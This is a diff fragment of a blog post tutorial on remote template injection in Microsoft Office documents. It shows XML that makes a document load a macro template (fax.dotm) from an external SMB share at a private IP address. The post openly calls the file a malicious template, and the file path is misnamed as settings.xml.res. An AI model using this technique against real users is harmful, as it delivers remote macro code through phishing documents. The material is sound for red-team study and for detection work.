notbricey/brisee.github.io/_posts/2022-01-09-remote-template-injection.md

 </p>

 ## Editing settings .xml to point to a SMB share and executing the document
 Within the initial malicious template file created, another Office document needs to be created.
 This Office document needs to be a template file as well but does not need any macros within it.
-Within the Office document created in this post, "text" was simply written in the document.
+Within the Office document created in this post, "test" was simply written in the document.
 To access `settings.xml.res`, the Office document that was just created needs to be extracted (with a tool like 7-Zip).
 After extracting the Office document and going to `word/_rels/settings.xml.res`, the following was stuck into the `settings.xml.res` file:
 ```xml
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
 <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\192.168.110.134\share\fax.dotm" TargetMode="External"/></Relationships>